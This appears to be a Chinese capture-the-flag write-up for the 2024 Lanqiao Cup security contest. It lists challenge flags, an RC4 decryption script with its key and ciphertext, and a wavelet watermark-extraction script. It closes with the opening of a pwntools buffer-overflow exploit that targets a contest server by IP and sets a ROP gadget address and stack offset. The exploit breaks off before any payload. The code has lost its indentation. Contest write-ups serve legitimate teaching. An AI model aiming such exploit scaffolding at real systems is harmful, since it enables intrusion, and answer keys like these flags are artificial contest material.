2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp

爬虫协议

flag{494547b4-f13f-47de-b1a5-a99f20495cd7}


packet

flag{7d6f17a4-2b0a-467d-8a42-66750368c249}

rc4

import base64
def rc4_main(key = "init_key", message = "init_message"):
print("RC4解密主函数调用成功")
print('\n')
s_box = rc4_init_sbox(key)
crypt = rc4_excrypt(message, s_box)
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
print("原来的 s 盒：%s" % s_box)
print('\n')
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
print("混乱后的 s 盒：%s"% s_box)
print('\n')
return s_box
def rc4_excrypt(plain, box):
print("调用解密程序成功。")
print('\n')
plain = base64.b64decode(plain.encode('utf-8'))
plain = bytes.decode(plain)
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
print("res用于解密字符串，解密后是：%res" %res)
print('\n')
cipher = "".join(res)
print("解密后的字符串是：%s" %cipher)
print('\n')
print("解密后的输出(没经过任何编码):")
print('\n')
return cipher
a=[182,66,183,252,240,162,94,169,61,41,54,31,84,41,114,168,99,50,242,68,139,133,236,13,173,63,147,163,146,116,129,101,105,236,228,57,133,169,202,175,178,198] #cipher
key="gamelab@"
s=""
for i in a:
s+=chr(i)
s=str(base64.b64encode(s.encode('utf-8')), 'utf-8')
rc4_main(key, s)


缺失的数据

import numpy as np
import cv2
import pywt

class WaterMarkDWT:
def __init__(self, origin: str, watermark: str, key: int, weight: list):
self.key = key
self.coef = weight

def arnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)

a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = (i + b * j) % r
y = (a * i + (a * b + 1) * j) % c
p[x, y] = img[i, j]
return p

def deArnold(self, img):
r, c = img.shape
p = np.zeros((r, c), np.uint8)

a, b = 1, 1
for k in range(self.key):
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
p[x, y] = img[i, j]
return p

def get(self, size: tuple = (1200, 1200), flag: int = None):
img = cv2.resize(self.img, size)

img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)

c = pywt.wavedec2(img2, 'db2', level=3)
[cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c

d = pywt.wavedec2(img1, 'db2', level=3)
[dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d

a1, a2, a3, a4 = self.coef

ca1 = (cl - dl) * a1
ch1 = (cH3 - dH3) * a2
cv1 = (cV3 - dV3) * a3
cd1 = (cD3 - dD3) * a4

waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
waterImg = np.array(waterImg, np.uint8)

waterImg = self.deArnold(waterImg)

kernel = np.ones((3, 3), np.uint8)
if flag == 0:
waterImg = cv2.erode(waterImg, kernel)
elif flag == 1:
waterImg = cv2.dilate(waterImg, kernel)

cv2.imwrite('水印.png', waterImg)
return waterImg

if __name__ == '__main__':
img = 'a.png'
waterImg = 'newImg.png'
k = 20
xs = [0.2, 0.2, 0.5, 0.4]
W1 = WaterMarkDWT(img, waterImg, k, xs)
W1.get()


fd

#!/usr/bin/python3
# -*- encoding: utf-8 -*-

from pwn import *

p = remote("47.93.142.153", 25722)
elf = ELF("/mnt/c/Users/崔志鹏/Desktop/临时/pwn")

pop_rdi = 0x0400933

# 64位
context(arch="amd64",os="linux")
stack_len = 0x20 + 0x8